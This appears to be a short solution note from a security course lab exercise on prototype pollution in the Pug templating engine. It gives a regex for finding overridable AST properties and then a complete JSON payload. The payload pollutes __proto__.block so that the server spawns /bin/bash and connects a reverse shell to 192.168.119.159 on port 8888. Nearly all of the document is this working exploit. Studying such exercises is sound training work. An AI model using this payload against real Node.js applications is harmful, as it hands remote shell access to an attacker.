14.5.2
Switch the Templating Engine to Pug and discover a path to RCE.
Solution
- Search for value that can be override and not predefined (ast.block) in this case.
if[ ]+\([a-zA-Z]+\.[a-zA-Z]+\)[ ]+\{โ> Regex
"__proto__":{"block": {"type":"Text","line":"net = global.process.mainModule.require('net'), sh = global.process.mainModule.require('child_process').exec('/bin/bash'), client = new net.Socket(), client.connect(8888, '192.168.119.159', function() {client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client);})"}}